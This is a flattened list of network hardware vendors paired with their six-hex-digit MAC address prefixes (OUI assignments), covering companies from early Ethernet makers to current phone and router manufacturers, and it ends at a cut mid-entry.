Interactive Technology, Inc. 000361 Widcomm, Inc. 000394 Connect One 00038A America Online, Inc. 00038D PCS Revenue Control Systems, Inc. 000388 Fastfame Technology Co., Ltd. 000359 DigitalSis 000352 Colubris Networks 00034C Shanghai DigiVision Technology Co., Ltd. 000378 HUMAX Co., Ltd. 000374 Control Microsystems 000376 Graphtec Technology, Inc. 00037E PORTech Communications, Inc. 00036D Runtop, Inc. 00036E Nicon Systems (Pty) Limited 000371 Acomz Networks Corp. 000349 Vidicode Datacommunicatie B.V. 00033E Tateyama System Laboratory Co., Ltd. 00033C Daiden Co., Ltd. 000325 Arima Computer Corp. 00031F Condev Ltd. 00029F L-3 Communication Aviation Recorders 00031B Cellvision Systems, Inc. 00031C Svenska Hardvarufabriken AB 0001A8 Welltech Computer Co., Ltd. 00030C Telesoft Technologies Ltd. 000308 AM Communications, Inc. 000307 Secure Works, Inc. 000306 Fusion In Tech Co., Ltd. 0002FC Cisco Systems, Inc 0002FA DX Antenna Co., Ltd. 0002FB Baumuller Aulugen-Systemtechnik GmbH 0002F6 Equipe Communications 000223 ClickTV 0002CB TriState Ltd. 0002CA EndPoints, Inc. 00032A UniData Communication Systems, Inc. 000324 SANYO Consumer Electronics Co., Ltd. 0002BF dotRocket, Inc. 000317 Merlin Systems, Inc. 000318 Cyras Systems, Inc. 0002E3 LITE-ON Communications, Inc. 0002DD Bromax Communications, Ltd. 000247 Great Dragon Information Technology (Group) Co., Ltd. 000243 Raysis Co., Ltd. 000231 Ingersoll-Rand 000266 Thermalogic Corporation 000268 Harris Government Communications 00025E High Technology Ltd 000260 Accordion Networks, Inc. 000283 Spectrum Controls, Inc. 000284 UK Grid Solutions Limited 000280 Mu Net, Inc. 009064 Thomson Inc. 00027A IOI Technology Corporation 000274 Tommy Technologies Corp. 00029E Information Equipment Co., Ltd. 00029B Kreatel Communications AB 000295 IP.Access Limited 000272 CC&C Technologies, Inc. 00026D Adept Telecom 00026B BCM Computers Co., Ltd. 000293 Solid Data Systems 000289 DNE Technologies 00012F Twinhead International Corp 0002A7 Vivace Networks 0001B2 Digital Processing Systems, Inc. 0001B8 Netsensity, Inc. 0001B9 SKF (U.K.) Limited 0001B3 Precision Electronic Manufacturing 0001BD Peterson Electro-Musical Products, Inc. 000209 Shenzhen SED Information Technology Co., Ltd. 000202 Amino Communications, Ltd. 000201 IFM Electronic gmbh 000234 Imperial Technology, Inc. 000236 INIT GmbH 00022B SAXA, Inc. 000224 C-COR 00021F Aculab PLC 00021A Zuma Networks 0001CA Geocast Network Systems, Inc. 0001D1 CoNet Communications, Inc. 000222 Chromisys, Inc. 000213 S.D.E.L. 0001DB Freecom Technologies GmbH 0001DF ISDN Communications, Ltd. 0001EF Camtel Technology Corp. 00020A Gefran Spa 000206 Telital R&D Denmark A/S 000179 WIRELESS TECHNOLOGY, INC. 000160 ELMEX Co., LTD. 00014E WIN Enterprises, Inc. 003073 International Microsystems, In 00303F TurboComm Tech Inc. 000184 SIEB & MEYER AG 000195 Sena Technologies, Inc. 0001A4 Microlink Corporation 00018E Logitec Corporation 00016D CarrierComm Inc. 00016F Inkel Corp. 000170 ESE Embedded System Engineer'g 00016A ALITEC 000153 ARCHTEK TELECOM CORPORATION 000135 KDC Corp. 000141 CABLE PRINT 000165 AirSwitch Corporation 000156 FIREWIREDIRECT.COM, INC. 0001B7 Centos, Inc. 0001B5 Turin Networks, Inc. 000183 ANITE TELECOMS 00017E ADTEK System Science Co., Ltd. 00010C System Talks Inc. 000111 iDigm Inc. 000107 Leiser GmbH 000114 KANDA TSUSHIN KOGYO CO., LTD. 00B0F5 NetWorth Technologies, Inc. 00B0DB Nextcell, Inc. 00B0AE Symmetricom 00B0E7 British Federal Ltd. 00B08E Cisco Systems, Inc 00305C SMAR Laboratories Corp. 003004 LEADTEK RESEARCH INC. 0030F9 Sollae Systems Co., Ltd. 000118 EZ Digital Co., Ltd. 00011C Universal Talkware Corporation 000128 EnjoyWeb, Inc. 000146 Tesco Controls, Inc. 000149 TDT AG 000131 Bosch Security Systems, Inc. 0030BE City-Net Technology, Inc. 003002 Expand Networks 003078 Cisco Systems, Inc 00B0EC EACEM 00B0DF Starboard Storage Systems 00010B Space CyberLink, Inc. 00309C Timing Applications, Inc. 00307E Redflex Communication Systems 00304F PLANET Technology Corporation 003022 Fong Kai Industrial Co., Ltd. 003070 1Net Corporation 0030F8 Dynapro Systems, Inc. 0030B7 Teletrol Systems, Inc. 0030B3 San Valley Systems, Inc. 003009 Tachion Networks, Inc. 00307A Advanced Technology & Systems 003061 MobyTEL 00300B mPHASE Technologies, Inc. 00308F MICRILOR, Inc. 003050 Versa Technology 0030C0 Lara Technology, Inc. 003005 Fujitsu Siemens Computers 0030E0 OXFORD SEMICONDUCTOR LTD. 003064 ADLINK TECHNOLOGY, INC. 0030DB Mindready Solutions, Inc. 0030E7 CNF MOBILE SOLUTIONS, INC. 0030B4 INTERSIL CORP. 0030B1 TrunkNet 003060 Powerfile, Inc. 0030A0 TYCO SUBMARINE SYSTEMS, LTD. 003015 CP CLARE CORP. 00301F OPTICAL NETWORKS, INC. 0030FA TELICA, INC. 00304B ORBACOM SYSTEMS, INC. 0030E9 GMA COMMUNICATION MANUFACT'G 0030A5 ACTIVE POWER 003084 ALLIED TELESYN INTERNAIONAL 003043 IDREAM TECHNOLOGIES, PTE. LTD. 003000 ALLWELL TECHNOLOGY CORP. 003011 HMS Industrial Networks 003068 CYBERNETICS TECH. CO., LTD. 003091 TAIWAN FIRST LINE ELEC. CORP. 0030CD CONEXANT SYSTEMS, INC. 00301A SMARTBRIDGES PTE. LTD. 003029 OPICOM 003083 Ivron Systems 0030B6 Cisco Systems, Inc 0030C7 Macromate Corp. 0030E4 CHIYODA SYSTEM RIKEN 003066 RFM 003031 LIGHTWAVE COMMUNICATIONS, INC. 00D007 MIC ASSOCIATES, INC. 00D0FF Cisco Systems, Inc 00D028 Harmonic, Inc 00D025 XROSSTECH, INC. 00D044 ALIDIAN NETWORKS, INC. 00305B Toko Inc. 00D049 IMPRESSTEK CO., LTD. 00D05B ACROLOOP MOTION CONTROL 00D042 MAHLO GMBH & CO. UG 00D031 INDUSTRIAL LOGIC CORPORATION 00D038 FIVEMERE, LTD. 00D0C6 THOMAS & BETTS CORP. 00D077 LUCENT TECHNOLOGIES 00D03E ROCKETCHIPS, INC. 00D093 TQ - COMPONENTS GMBH 00D03F AMERICAN COMMUNICATION 00D0F7 NEXT NETS CORPORATION 00D06F KMC CONTROLS 00D0FC GRANITE MICROSYSTEMS 00D0A6 LANBIRD TECHNOLOGY CO., LTD. 00D003 COMDA ENTERPRISES CORP. 00D0D2 EPILOG CORPORATION 00D0F9 ACUTE COMMUNICATIONS CORP. 00D0CE iSystem Labs 00D018 QWES. COM, INC. 0001A7 UNEX TECHNOLOGY CORPORATION 00D08C GENOA TECHNOLOGY, INC. 00D059 AMBIT MICROSYSTEMS CORP. 00D0FD OPTIMA TELE.COM, INC. 00D0A9 SHINANO KENSHI CO., LTD. 00D0DD SUNRISE TELECOM, INC. 00D0E6 IBOND INC. 00D0D1 Sycamore Networks 00D087 MICROFIRST INC. 00D080 EXABYTE CORPORATION 00D091 SMARTSAN SYSTEMS, INC. 00D04E LOGIBAG 00D027 APPLIED AUTOMATION, INC. 00D072 BROADLOGIC 00D0E2 MRT MICRO, INC. 00D06A LINKUP SYSTEMS CORPORATION 00D089 DYNACOLOR, INC. 00D02C CAMPBELL SCIENTIFIC, INC. 00D0CD ATAN TECHNOLOGY INC. 00D040 SYSMATE CO., LTD. 00D01A URMETTLC S.P.A. 0050FF HAKKO ELECTRONICS CO., LTD. 0050D2 CMC Electronics Inc 0050F9 Sensormatic Electronics LLC 005048 INFOLIBRIA 00504E SIERRA MONITOR CORP. 0050F6 PAN-INTERNATIONAL INDUSTRIAL CORP. 00506C Beijer Electronics Products AB 0050D7 TELSTRAT 005044 ASACA CORPORATION 0050E6 HAKUSAN CORPORATION 00503C TSINGHUA NOVEL ELECTRONICS 005060 TANDBERG TELECOM AS 0050EE TEK DIGITEL CORPORATION 005045 RIOWORKS SOLUTIONS, INC. 00502B GENRAD LTD. 00502E CAMBEX CORPORATION 00506E CORDER ENGINEERING CORPORATION 00502C SOYO COMPUTER, INC. 005077 PROLIFIC TECHNOLOGY, INC. 005033 MAYAN NETWORKS 00500E CHROMATIS NETWORKS, INC. 00D0CC TECHNOLOGIES LYRE INC. 0050EC OLICOM A/S 0050C9 MASPRO DENKOH CORP. 0050BB CMS TECHNOLOGIES 005062 KOUWELL ELECTRONICS CORP.** 0050D5 AD SYSTEMS CORP. 0050F3 GLOBAL NET INFORMATION CO., Ltd. 0050BE FAST MULTIMEDIA AG 00506F G-CONNECT 0050F8 ENTREGA TECHNOLOGIES, INC. 005042 SCI MANUFACTURING SINGAPORE PTE, LTD. 0050C0 GATAN, INC. 005051 IWATSU ELECTRIC CO., LTD. 00507D IFP 005097 MMC-EMBEDDED COMPUTERTECHNIK GmbH 005010 NovaNET Learning, Inc. 00509A TAG ELECTRONIC SYSTEMS 005022 ZONET TECHNOLOGY, INC. 005007 SIEMENS TELECOMMUNICATION SYSTEMS LIMITED 005040 Panasonic Electric Works Co., Ltd. 00501C JATOM SYSTEMS, INC. 005092 Rigaku Corporation Osaka Plant 00507A XPEED, INC. 005069 PixStream Incorporated 005068 ELECTRONIC INDUSTRIES ASSOCIATION 0050BC HAMMER STORAGE SOLUTIONS 009071 Applied Innovation Inc. 0050EB ALPHA-TOP CORPORATION 0050EF SPE Systemhaus GmbH 005098 GLOBALOOP, LTD. 00504F OLENCOM ELECTRONICS 0090FF TELLUS TECHNOLOGY INC. 00903E N.V. PHILIPS INDUSTRIAL ACTIVITIES 0090BA VALID NETWORKS, INC. 009018 ITO ELECTRIC INDUSTRY CO, LTD. 0090CD ENT-EMPRESA NACIONAL DE TELECOMMUNICACOES, S.A. 0090FB PORTWELL, INC. 009094 OSPREY TECHNOLOGIES, INC. 0090B3 AGRANAT SYSTEMS 00903C ATLANTIC NETWORK SYSTEMS 00905D NETCOM SICHERHEITSTECHNIK GMBH 0090D1 LEICHU ENTERPRISE CO., LTD. 009046 DEXDYNE, LTD. 0090DA DYNARC, INC. 0090E0 SYSTRAN CORP. 0090D0 Thomson Telecom Belgium 00909B MARKEM-IMAJE 009022 IVEX 009016 ZAC 0090A7 CLIENTEC CORPORATION 009053 DAEWOO ELECTRONICS CO., LTD. 0090DC TECO INFORMATION SYSTEMS 0090E2 DISTRIBUTED PROCESSING TECHNOLOGY 009085 GOLDEN ENTERPRISES, INC. 0090C7 ICOM INC. 009035 ALPHA TELECOM, INC. 00900F KAWASAKI HEAVY INDUSTRIES, LTD 0090EA ALPHA TECHNOLOGIES, INC. 009077 ADVANCED FIBRE COMMUNICATIONS 009099 ALLIED TELESIS, K.K. 0010AD SOFTRONICS USB, INC. 0010A7 UNEX TECHNOLOGY CORPORATION 0010D5 IMASDE CANARIAS, S.A. 001055 FUJITSU MICROELECTRONICS, INC. 00907A Spectralink, Inc 0090F0 Harmonic Video Systems Ltd. 009020 PHILIPS ANALYTICAL X-RAY B.V. 0010A3 OMNITRONIX, INC. 00905C EDMI 0090E3 AVEX ELECTRONICS INC. 0090A9 WESTERN DIGITAL 0090F3 ASPECT COMMUNICATIONS 00904F ABB POWER T&D COMPANY, INC. 009060 SYSTEM CREATE CORP. 009013 SAMSAN CORP. 001052 METTLER-TOLEDO (ALBSTADT) GMBH 00106B SONUS NETWORKS, INC. 0010C3 CSI-CONTROL SYSTEMS 009055 PARKER HANNIFIN CORPORATION COMPUMOTOR DIVISION 0010DD ENABLE SEMICONDUCTOR, INC. 00102D HITACHI SOFTWARE ENGINEERING 001033 ACCESSLAN COMMUNICATIONS, INC. 001012 PROCESSOR SYSTEMS (I) PVT LTD 001015 OOmon Inc. 001078 NUERA COMMUNICATIONS, INC. 00104F Oracle Corporation 00107A AmbiCom, Inc. 0010B9 MAXTOR CORP. 00105D Draeger Medical 001091 NO WIRES NEEDED BV 00101B CORNET TECHNOLOGY, INC. 0010DC MICRO-STAR INTERNATIONAL CO., LTD. 00100A WILLIAMS COMMUNICATIONS GROUP 001032 ALTA TECHNOLOGY 001080 METAWAVE COMMUNICATIONS 0010F4 Vertical Communications 001077 SAF DRIVE SYSTEMS, LTD. 0010B3 NOKIA MULTIMEDIA TERMINALS 00101E MATSUSHITA ELECTRONIC INSTRUMENTS CORP. 00104D SURTEC INDUSTRIES, INC. 001051 CMICRO CORPORATION 001037 CYQ've Technology Co., Ltd. 00E0BB NBX CORPORATION 00E08A GEC AVERY, LTD. 00E086 Emerson Network Power, Avocent Division 00E01B SPHERE COMMUNICATIONS, INC. 00E059 CONTROLLED ENVIRONMENTS, LTD. 00E0C5 BCOM ELECTRONICS INC. 00E0EE MAREL HF 00E08E UTSTARCOM 00E03F JATON CORPORATION 00E0D4 EXCELLENT COMPUTER 00E07F LOGISTISTEM s.r.l. 00E013 EASTERN ELECTRONIC CO., LTD. 00E0FD A-TREND TECHNOLOGY CO., LTD. 00E0BD INTERFACE SYSTEMS, INC. 00E06E FAR SYSTEMS S.p.A. 00E06D COMPUWARE CORPORATION 00E0EA INNOVAT COMMUNICATIONS, INC. 00E064 SAMSUNG ELECTRONICS 00E0C9 AutomatedLogic Corporation 00E038 PROXIMA CORPORATION 00E09C MII 00E0E9 DATA LABS, INC. 00E00C MOTOROLA 00E00A DIBA, INC. 00E0C4 HORNER ELECTRIC, INC. 00E069 JAYCOR 00E0A4 ESAOTE S.p.A. 00E0DE DATAX NV 00E0A5 ComCore Semiconductor, Inc. 00E015 HEIWA CORPORATION 00E0E8 GRETACODER Data Systems AG 00E016 RAPID CITY COMMUNICATIONS 00E005 TECHNICAL CORP. 00E0C1 MEMOREX TELEX JAPAN, LTD. 00E0A9 FUNAI ELECTRIC CO., LTD. 00E084 COMPULITE R&D 00E096 SHIMADZU CORPORATION 00E017 EXXACT GmbH 00607F AURORA TECHNOLOGIES, INC. 00E029 STANDARD MICROSYSTEMS CORP. 006074 QSC LLC 006076 SCHLUMBERGER TECHNOLOGIES RETAIL PETROLEUM SYSTEMS 0060A1 VPNet, Inc. 006027 Superior Modular Products 0060BC KeunYoung Electronics & Communication Co., Ltd. 0060A5 PERFORMANCE TELECOM CORP. 006005 FEEDBACK DATA LTD. 00602E CYCLADES CORPORATION 0060B6 LAND COMPUTER CO., LTD. 00606C ARESCOM 0060E3 ARBIN INSTRUMENTS 006071 MIDAS LAB, INC. 006061 WHISTLE COMMUNICATIONS CORP. 00601B MESA ELECTRONICS 0060C5 ANCOT CORP. 0060A9 GESYTEC MBH 0060F2 LASERGRAPHICS, INC. 0060C3 NETVISION CORPORATION 006029 CARY PERIPHERALS INC. 0060A8 TIDOMAT AB 0060FC CONSERVATION THROUGH INNOVATION LTD. 006018 STELLAR ONE CORPORATION 00600A SORD COMPUTER CORPORATION 0060A4 GEW Technologies (PTY)Ltd 006064 NETCOMM LIMITED 0060F9 DIAMOND LANE COMMUNICATIONS 0060EA StreamLogic 006082 NOVALINK TECHNOLOGIES, INC. 0060E7 RANDATA 0060D9 TRANSYS NETWORKS INC. 00601F STALLION TECHNOLOGIES 006054 CONTROLWARE GMBH 0060C2 MPL AG 0060D4 ELDAT COMMUNICATION LTD. 00A04E VOELKER TECHNOLOGIES, INC. 00A05A KOFAX IMAGE PRODUCTS 00A052 STANILITE ELECTRONICS PTY. LTD 00A05E MYRIAD LOGIC INC. 00A095 ACACIA NETWORKS, INC. 00A053 COMPACT DEVICES, INC. 00A069 Symmetricom, Inc. 00A07A ADVANCED PERIPHERALS TECHNOLOGIES, INC. 00609B AstroNova, Inc 0060DB NTP ELEKTRONIK A/S 006052 PERIPHERALS ENTERPRISE CO., Ltd. 0060B2 PROCESS CONTROL CORP. 006081 TV/COM INTERNATIONAL 00A005 DANIEL INSTRUMENTS, LTD. 00A0F2 INFOTEK COMMUNICATIONS, INC. 00A0DF STS TECHNOLOGIES, INC. 00A094 COMSAT CORPORATION 00A0EF LUCIDATA LTD. 00A020 CITICORP/TTI 00A0CE Ecessa 00A028 CONNER PERIPHERALS 00A09E ICTV 00A099 K-NET LTD. 00A0EC TRANSMITTON LTD. 00A067 NETWORK SERVICES GROUP 00A0E0 TENNYSON TECHNOLOGIES PTY LTD 00A0FD SCITEX DIGITAL PRINTING, INC. 00A00F Broadband Technologies 00A002 LEEDS & NORTHRUP AUSTRALIA PTY LTD 00A0E4 OPTIQUEST 00A0EE NASHOBA NETWORKS 00A0C3 UNICOMPUTER GMBH 00A00A Airspan 00A0E7 CENTRAL DATA CORPORATION 00A080 Tattile SRL 00A02B TRANSITIONS RESEARCH CORP. 00A0E8 REUTERS HOLDINGS PLC 00A008 NETCORP 00A050 CYPRESS SEMICONDUCTOR 00A0DD AZONIX CORPORATION 00A075 MICRON TECHNOLOGY, INC. 00A009 WHITETREE NETWORK 00A00C KINGMAX TECHNOLOGY, INC. 00A066 ISA CO., LTD. 00A0AB NETCS INFORMATIONSTECHNIK GMBH 00A0D8 SPECTRA - TEK 00A0FA Marconi Communication GmbH 00A0CB ARK TELECOMMUNICATIONS, INC. 00A034 AXEL 00A001 DRS Signal Solutions 0020B2 GKD Gesellschaft Fur Kommunikation Und Datentechnik 002052 RAGULA SYSTEMS 0020FC MATROX 0020FE TOPWARE INC. / GRAND COMPUTER 002073 FUSION SYSTEMS CORPORATION 002035 IBM Corp 00A017 J B M CORPORATION 00A025 REDCOM LABS INC. 00A0BB HILAN GMBH 00A091 APPLICOM INTERNATIONAL 00A0A5 TEKNOR MICROSYSTEME, INC. 0020B7 NAMAQUA COMPUTERWARE 0020E3 MCD KENCOM CORPORATION 002013 DIVERSIFIED TECHNOLOGY, INC. 0020AB MICRO INDUSTRIES CORP. 00208D CMD TECHNOLOGY 0020DD Cybertec Pty Ltd 0020E6 LIDKOPING MACHINE TOOLS AB 00A0A2 DIGICOM S.P.A. 002086 MICROTECH ELECTRONICS LIMITED 002023 T.C. TECHNOLOGIES PTY. LTD 00A054 Private 00205A COMPUTER IDENTICS 002000 LEXMARK INTERNATIONAL, INC. 00201D KATANA PRODUCTS 002003 PIXEL POWER LTD. 002046 CIPRICO, INC. 00209B ERSAT ELECTRONIC GMBH 00201C EXCEL, INC. 00207F KYOEI SANGYO CO., LTD. 0020C9 VICTRON BV 002077 KARDIOS SYSTEMS CORP. 00207A WiSE Communications, Inc. 00203E LogiCan Technologies, Inc. 002058 ALLIED SIGNAL INC. 0020E1 ALAMAR ELECTRONICS 002026 AMKLY SYSTEMS, INC. 002065 SUPERNET NETWORKING INC. 00202A N.V. DZINE 002083 PRESTICOM INCORPORATED 002019 OHLER GMBH 00209E BROWN'S OPERATING SYSTEM SERVICES, LTD. 00208E CHEVIN SOFTWARE ENG. LTD. 002097 APPLIED SIGNAL TECHNOLOGY 00C00B NORCONTROL A.S. 0020B0 GATEWAY DEVICES, INC. 00205B Kentrox, LLC 0020F6 NET TEKAND KARLNET, INC. 0020C6 NECTEC 002008 CABLE & COMPUTER TECHNOLOGY 0020D3 OST (OUEST STANDARD TELEMATIQU 00C00E PSITECH, INC. 00C031 DESIGN RESEARCH SYSTEMS, INC. 000701 RACAL-DATACOM 00C09C HIOKI E.E. CORPORATION 00C0AA SILICON VALLEY COMPUTER 00C066 DOCUPOINT, INC. 00C02D FUJI PHOTO FILM CO., LTD. 00C0F2 TRANSITION NETWORKS 00C0BD INEX TECHNOLOGIES, INC. 00C088 EKF ELEKTRONIK GMBH 00C011 INTERACTIVE COMPUTING DEVICES 00C03E FA. GEBR. HELLER GMBH 00C0FD PROSUM 00C014 TELEMATICS CALABASAS INT'L,INC 00AA3C OLIVETTI TELECOM SPA (OLTECO) 00C0C9 ELSAG BAILEY PROCESS 00C048 BAY TECHNICAL ASSOCIATES 00C076 I-DATA INTERNATIONAL A-S 00C046 Blue Chip Technology Ltd 00C097 ARCHIPEL SA 00C004 JAPAN BUSINESS COMPUTER CO.LTD 00C060 ID SCANDINAVIA AS 0040CC SILCOM MANUF'G TECHNOLOGY INC. 00C09E CACHE COMPUTERS, INC. 00C0AC GAMBIT COMPUTER COMMUNICATIONS 00C034 TRANSACTION NETWORK 00C093 ALTA RESEARCH CORP. 0040E7 ARNOS INSTRUMENTS & COMPUTER 004087 UBITREX CORPORATION 004007 TELMAT INFORMATIQUE 00407B SCIENTIFIC ATLANTA 00402C ISIS DISTRIBUTED SYSTEMS, INC. 00C0DF KYE Systems Corp. 00C0F5 METACOMP, INC. 00C091 JABIL CIRCUIT, INC. 00C049 U.S. ROBOTICS, INC. 00C09D DISTRIBUTED SYSTEMS INT'L, INC 00C0E9 OAK SOLUTIONS, LTD. 00C0C5 SID INFORMATICA 00C051 ADVANCED INTEGRATION RESEARCH 00C085 ELECTRONICS FOR IMAGING, INC. 00C0B2 NORAND CORPORATION 00C054 NETWORK PERIPHERALS, LTD. 00C022 LASERMASTER TECHNOLOGIES, INC. 00C025 DATAPRODUCTS CORPORATION 0040CF STRAWBERRY TREE, INC. 004077 MAXTON TECHNOLOGY CORPORATION 00C02C CENTRUM COMMUNICATIONS, INC. 00C0FB ADVANCED TECHNOLOGY LABS 00C02B GERLOFF GESELLSCHAFT FUR 004074 CABLE AND WIRELESS 0040B8 IDEA ASSOCIATES 0040E8 CHARLES RIVER DATA SYSTEMS,INC 0040C0 VISTA CONTROLS CORPORATION 00C0A0 ADVANCE MICRO RESEARCH, INC. 00C010 HIRAKAWA HEWTECH CORP. 00C037 DYNATEM 004083 TDA INDUSTRIA DE PRODUTOS 00405B FUNASSET LIMITED 004073 BASS ASSOCIATES 00407D EXTENSION TECHNOLOGY CORP. 0080D7 Fantum Engineering 00807A AITECH SYSTEMS LTD. 0080DC PICKER INTERNATIONAL 00404D TELECOMMUNICATIONS TECHNIQUES 00400D LANNET DATA COMMUNICATIONS,LTD 004019 AEON SYSTEMS, INC. 0040BE BOEING DEFENSE & SPACE 00406E COROLLARY, INC. 004076 Sun Conversion Technologies 004022 KLEVER COMPUTERS, INC. 0040BF CHANNEL SYSTEMS INTERN'L INC. 00401E ICC 00409A NETWORK EXPRESS, INC. 004094 SHOGRAPHICS, INC. 004055 METRONIX GMBH 004027 SMC MASSACHUSETTS, INC. 00408B RAYLAN CORPORATION 0040EF HYPERCOM, INC. 004093 PAXDATA NETWORKS LTD. 004085 SAAB INSTRUMENTS AB 004023 LOGIC CORPORATION 0040A4 ROSE ELECTRONICS 004008 A PLUS INFO CORPORATION 0040B5 VIDEO TECHNOLOGY COMPUTERS LTD 004012 WINDATA, INC. 0040D5 Sartorius Mechatronics T&H GmbH 004010 SONIC SYSTEMS, INC. 0040CA FIRST INTERNAT'L COMPUTER, INC 0040C4 KINKEI SYSTEM CORPORATION 00405D STAR-TEK, INC. 0040E2 MESA RIDGE TECHNOLOGIES, INC. 00408C AXIS COMMUNICATIONS AB 004045 TWINHEAD CORPORATION 004028 NETCOMM LIMITED 0040DD HONG TECHNOLOGIES 0040CB LANWAN TECHNOLOGIES 0040B2 SYSTEMFORSCHUNG 0040E6 C.A.E.N. 0040F0 MicroBrain,Inc. 004089 MEIDENSHA CORPORATION 004015 ASCOM INFRASYS AG 008095 BASIC MERTON HANDELSGES.M.B.H. 0080AE HUGHES NETWORK SYSTEMS 00803A VARITYPER, INC. 00801C NEWPORT SYSTEMS SOLUTIONS 008056 SPHINX Electronics GmbH & Co KG 008031 BASYS, CORP. 0080DB GRAPHON CORPORATION 008082 PEP MODULAR COMPUTERS GMBH 008039 ALCATEL STC AUSTRALIA 008023 INTEGRATED BUSINESS NETWORKS 00806B SCHMID TELECOMMUNICATION 008059 STANLEY ELECTRIC CO., LTD 008041 VEB KOMBINAT ROBOTRON 008080 DATAMEDIA CORPORATION 00803F TATUNG COMPANY 0080E6 PEER NETWORKS, INC. 0080E0 XTP SYSTEMS, INC. 008088 VICTOR COMPANY OF JAPAN, LTD. 0080D8 NETWORK PERIPHERALS INC. 00809E DATUS GMBH 00802B INTEGRATED MARKETING CO 008001 PERIPHONICS CORPORATION 008097 CENTRALP AUTOMATISMES 008071 SAI TECHNOLOGY 008098 TDK CORPORATION 0080CA NETCOM RESEARCH INCORPORATED 0080D5 CADRE TECHNOLOGIES 00801B KODIAK TECHNOLOGY 0080D3 SHIVA CORP. 0080B3 AVAL DATA CORPORATION 0080E7 Leonardo Tactical Systems. 008020 NETWORK PRODUCTS 008070 COMPUTADORAS MICRON 008008 DYNATECH COMPUTER SYSTEMS 0000E4 IN2 GROUPE INTERTECHNIQUE 008013 THOMAS-CONRAD CORPORATION 00806E NIPPON STEEL CORPORATION 008010 COMMODORE INTERNATIONAL 008047 IN-NET CORP. 008067 SQUARE D COMPANY 008045 MATSUSHITA ELECTRIC IND. CO 0080BF TAKAOKA ELECTRIC MFG. CO. LTD. 0080F9 HEURIKON CORPORATION 0080A1 MICROTEST, INC. 0080A9 CLEARPOINT RESEARCH 008017 PFU LIMITED 0080F8 MIZAR, INC. 000014 NETRONIX 000072 MINIWARE TECHNOLOGY 0000A1 MARQUETTE ELECTRIC CO. 0000F5 DIAMOND SALES LIMITED 00005C TELEMATICS INTERNATIONAL INC. 0000AC CONWARE COMPUTER CONSULTING 000094 ASANTE TECHNOLOGIES 000090 MICROCOM 000047 NICOLET INSTRUMENTS CORP. 000021 SUREMAN COMP. & COMMUN. CORP. 000030 VG LABORATORY SYSTEMS LTD 000035 SPECTRAGRAPHICS CORPORATION 000026 SHA-KEN CO., LTD. 0000B6 MICRO-MATIC RESEARCH 000082 LECTRA SYSTEMES SA 00002B CRISP AUTOMATION, INC 000051 HOB ELECTRONIC GMBH & CO. KG 0000A7 NETWORK COMPUTING DEVICES INC. 000098 CROSSCOMM CORPORATION 0000C6 EON SYSTEMS 000070 HCL LIMITED 00008F Raytheon 0000F1 MAGNA COMPUTER CORPORATION 000054 Schneider Electric 000020 DATAINDUSTRIER DIAB AB 00007A DANA COMPUTER INC. 000045 FORD AEROSPACE & COMM. CORP. 00009C ROLM MIL-SPEC COMPUTERS 00007C AMPERE INCORPORATED 000068 ROSEMOUNT CONTROLS 0000E9 ISICAD, INC. 00009F AMERISTAR TECHNOLOGIES INC. 0000E3 INTEGRATED MICRO PRODUCTS LTD 0000AD BRUKER INSTRUMENTS INC. 000074 RICOH COMPANY LTD. 000046 OLIVETTI NORTH AMERICA 00008D Cryptek Inc. 00003B i Controls, Inc. 0000B3 CIMLINC INCORPORATED 0000D3 WANG LABORATORIES INC. 0000D0 DEVELCON ELECTRONICS LTD. 000093 PROTEON INC. 00008B INFOTRON 080057 Evans & Sutherland 08005D GOULD INC. 08005B VTA TECHNOLOGIES INC. 080071 MATRA (DSIE) 08006C SUNTEK TECHNOLOGY INT'L 080067 ComDesign 08008C NETWORK RESEARCH CORPORATION 080081 ASTECH INC. 08002D LAN-TEC INC. 00DD00 UNGERMANN-BASS INC. 0000AA XEROX CORPORATION 040AE0 XMIT AG COMPUTER NETWORKS 080011 TEKTRONIX INC. 080026 NORSK DATA A.S. 080025 CONTROL DATA 100000 Private 0000D7 DARTMOUTH COLLEGE AA0004 DIGITAL EQUIPMENT CORPORATION 08000C MIKLYN DEVELOPMENT CO. 00DD05 UNGERMANN-BASS INC. 08001D ABLE COMMUNICATIONS INC. 00DD0B UNGERMANN-BASS INC. 080003 ADVANCED COMPUTER COMM. 00DD03 UNGERMANN-BASS INC. 00DD0F UNGERMANN-BASS INC. 000001 XEROX CORPORATION 080017 NATIONAL SEMICONDUCTOR 542160 Alula 10B3C6 Cisco Systems, Inc 10B3D6 Cisco Systems, Inc 589630 Technicolor CH USA Inc. F854B8 Amazon Technologies Inc. 781735 Nokia Shanghai Bell Co., Ltd. 3C894D Dr. Ing. h.c. F. Porsche AG 84C807 ADVA Optical Networking Ltd. B43939 Shenzhen TINNO Mobile Technology Corp. A0AB51 WEIFANG GOERTEK ELECTRONICS CO.,LTD 64C901 INVENTEC Corporation 749EF5 Samsung Electronics Co.,Ltd 68BFC4 Samsung Electronics Co.,Ltd A85E45 ASUSTek COMPUTER INC. 04B1A1 Samsung Electronics Co.,Ltd CC464E Samsung Electronics Co.,Ltd F8893C Inventec Appliances Corp. A0DF15 HUAWEI TECHNOLOGIES CO.,LTD C4AD34 Routerboard.com 306F07 Nations Technologies Inc. 2474F7 GoPro 7CD566 Amazon Technologies Inc. 686350 Hella India Automotive Pvt Ltd 5CE50C Beijing Xiaomi Mobile Software Co., Ltd 18703B Huawei Device Co., Ltd. D89E61 Huawei Device Co., Ltd. 347E00 Huawei Device Co., Ltd. 003092 Kontron Electronics AG 80751F BSkyB Ltd E85A8B Xiaomi Communications Co Ltd 442295 China Mobile Iot Limited company 5C710D Cisco Systems, Inc 00AB48 eero inc. F855CD Visteon Corporation 441847 HUNAN SCROWN ELECTRONIC INFORMATION TECH.CO.,LTD 1CC1BC Yichip Microelectronics (Hangzhou) Co.,Ltd AC61B9 WAMA Technology Limited C4D8F3 iZotope 003056 HMS Industrial Networks 680AE2 Silicon Laboratories AC8B9C Primera Technology, Inc. 2C3AFD AVM Audiovisuelles Marketing und Computersysteme GmbH 34495B Sagemcom Broadband SAS C8F319 LG Electronics (Mobile Communications) 801609 Sleep Number 045EA4 SHENZHEN NETIS TECHNOLOGY CO.,LTD 1CBFC0 CHONGQING FUGUI ELECTRONICS CO.,LTD. 78B46A HUAWEI TECHNOLOGIES CO.,LTD 6CEBB6 HUAWEI TECHNOLOGIES CO.,LTD 4CF55B HUAWEI TECHNOLOGIES CO.,LTD E83F67 Huawei Device Co., Ltd. 3446EC Huawei Device Co., Ltd. 643139 IEEE Registration Authority A44BD5 Xiaomi Communications Co Ltd 64956C LG Electronics 14876A Apple, Inc. E0B55F Apple, Inc. F8FFC2 